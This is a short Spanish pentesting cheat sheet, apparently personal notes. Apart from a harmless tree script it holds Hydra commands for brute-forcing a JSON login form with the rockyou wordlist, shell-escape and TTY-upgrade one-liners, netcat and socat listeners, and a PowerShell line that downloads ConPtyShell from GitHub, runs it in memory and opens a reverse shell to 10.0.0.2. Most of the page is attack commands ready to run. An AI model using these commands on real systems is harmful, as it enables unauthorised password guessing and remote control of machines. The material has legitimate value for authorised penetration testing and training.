Saltar a contenido

General

Utilidades

Linux

tree.sh

#!/bin/bash
pwd=$(pwd)
echo Tree of: $pwd
find $pwd -print | sed -e "s;$pwd;\.;g;s;[^/]*\/;|__;g;s;__|; |;g"
#very simple script. REALLY!
echo '|__end tree'

Herramientas

Hydra

hydra -l <USER> -p <PASSWORD> <IP_ADDRESS> http-post-form "<LOGIN_PAGE>:<REQUEST_BODY>:<ERROR_MESSAGE>"
JSON Payload
hydra -l "root@dasith.works" -P "/usr/share/wordlists/rockyou.txt" -s 3000 10.129.244.81 http-post-form "/api/user/login:{\"email\"\:\"^USER^\",\"password\"\:\"^PASS^\"}:S=Password is wrong:H=content-type: application/json"

TTY

Linux

ctrl + z
echo $TERM && tput lines && tput cols

# bash
stty raw -echo
fg

# zsh
stty raw -echo; fg

reset
export SHELL=bash
export TERM=xterm-256color
stty rows <num> columns <cols>

socat:

socat file:`tty`,raw,echo=0 tcp-listen:1234

Intérprete:

/usr/bin/script -qc /bin/bash /dev/null
/bin/sh -i
python3 -c 'import pty; pty.spawn("/bin/sh")'
python3 -c "__import__('pty').spawn('/bin/bash')"
python3 -c "__import__('subprocess').call(['/bin/bash'])"
perl -e 'exec "/bin/sh";'
perl: exec "/bin/sh";
perl -e 'print `/bin/bash`'
ruby: exec "/bin/sh"
lua: os.execute('/bin/sh')

# vi
:!bash
:set shell=/bin/bash:shell

# nmap
!sh

# mysql
! bash

Windows

ConPtyShell

Server:

# 1
rlwrap nc -lvnp 3001

# 2
stty raw -echo; (stty size; cat) | nc -lvnp 3001

Cliente:

IEX(IWR https://raw.githubusercontent.com/antonioCoco/ConPtyShell/master/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell 10.0.0.2 3001

Proxy debugging

TODO: Agregar comandos de shellhacks.com para redireccionar todo el tráfico de la consola a burpsuite